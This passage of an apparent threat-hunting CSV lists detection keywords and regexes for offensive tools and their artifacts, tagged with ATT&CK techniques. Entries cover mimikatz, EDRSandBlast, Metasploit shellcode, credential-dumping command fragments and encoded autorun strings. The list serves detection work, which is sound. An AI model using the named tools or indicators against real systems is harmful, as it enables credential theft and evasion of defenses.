"*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkVDQg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpaZXJvcw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpBTlNJWDkyMw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpJU08xMDEyNg\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw==*",".{0,1000}W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNw\=\=.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" 
"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*",".{0,1000}W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*w32-speaking-shellcode.asm*",".{0,1000}w32\-speaking\-shellcode\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*w32-speaking-shellcode.bin*",".{0,1000}w32\-speaking\-shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*w32-speaking-shellcode-eaf.bin*",".{0,1000}w32\-speaking\-shellcode\-eaf\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*w3af_gui*",".{0,1000}w3af_gui.{0,1000}","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework. 
The project's goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WaaSMedicCapsule.dll*",".{0,1000}WaaSMedicCapsule\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*WaaSMedicPayload.dll*",".{0,1000}WaaSMedicPayload\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*WAF-bypass-Cheat-Sheet*",".{0,1000}WAF\-bypass\-Cheat\-Sheet.{0,1000}","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","5","410","64","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z" "*wafw00f https://*",".{0,1000}wafw00f\shttps\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wafw00f*",".{0,1000}wafw00f.{0,1000}","offensive_tool_keyword","wafw00f","To do 
its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4879","910","2024-03-26T20:24:24Z","2014-05-14T17:08:16Z" "*Waiting for rootkit response*",".{0,1000}Waiting\sfor\srootkit\sresponse.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*waleedassar/SimpleNTSyscallFuzzer*",".{0,1000}waleedassar\/SimpleNTSyscallFuzzer.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*wapiti -u*",".{0,1000}wapiti\s\-u.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti.git*",".{0,1000}wapiti\.git.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability 
scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti.py*",".{0,1000}wapiti\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti3-*.tar.gz*",".{0,1000}wapiti3\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti3-*-any.whl*",".{0,1000}wapiti3\-.{0,1000}\-any\.whl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti3/bin*",".{0,1000}wapiti3\/bin.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wapiti-getcookie*",".{0,1000}wapiti\-getcookie.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*wappalyzer.py*",".{0,1000}wappalyzer\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in 
Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*warberry*",".{0,1000}warberry.{0,1000}","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acquiring informational data from a target network. especially useful during red teaming engagements. It's designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPi's scripts are designed in such a way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","10","2217","291","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z" "*warpzoneclient.cpp*",".{0,1000}warpzoneclient\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*warpzoneclient.exe*",".{0,1000}warpzoneclient\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" 
"*warpzoneclient.sln*",".{0,1000}warpzoneclient\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*warpzoneclient.vcxproj*",".{0,1000}warpzoneclient\.vcxproj.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*washingtonP1974/Rev-Shell*",".{0,1000}washingtonP1974\/Rev\-Shell.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*wavestone-cdt/EDRSandblast*",".{0,1000}wavestone\-cdt\/EDRSandblast.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponizes a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" 
"*wavestone-cdt/Invoke-CleverSpray*",".{0,1000}wavestone\-cdt\/Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*wavvs/nanorobeus*",".{0,1000}wavvs\/nanorobeus.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*waza1234*",".{0,1000}waza1234.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*WazeHell/sam-the-admin*",".{0,1000}WazeHell\/sam\-the\-admin.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","10","959","191","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*wce -i 3e5 -s *",".{0,1000}wce\s\-i\s3e5\s\-s\s.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - 
TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*wce*getlsasrvaddr.exe*",".{0,1000}wce.{0,1000}getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wce-master.zip*",".{0,1000}wce\-master\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wce-universal.exe*",".{0,1000}wce\-universal\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*wcfrelayserver.py*",".{0,1000}wcfrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*WCMCredentials.txt*",".{0,1000}WCMCredentials\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*wdextract *:\*\*.vdm*",".{0,1000}wdextract\s.{0,1000}\:\\.{0,1000}\\.{0,1000}\.vdm.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*wdextract *\mrt.exe*",".{0,1000}wdextract\s.{0,1000}\\mrt\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*WDExtract-master*",".{0,1000}WDExtract\-master.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*wdigest!g_fParameter_UseLogonCredential*",".{0,1000}wdigest!g_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*wdigest!g_IsCredGuardEnabled*",".{0,1000}wdigest!g_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*wdigest/decryptor.py*",".{0,1000}wdigest\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*--wdigest-offsets *.csv 
*",".{0,1000}\-\-wdigest\-offsets\s.{0,1000}\.csv\s.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*WdigestOffsets.csv*",".{0,1000}WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*We had a woodoo*",".{0,1000}We\shad\sa\swoodoo.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 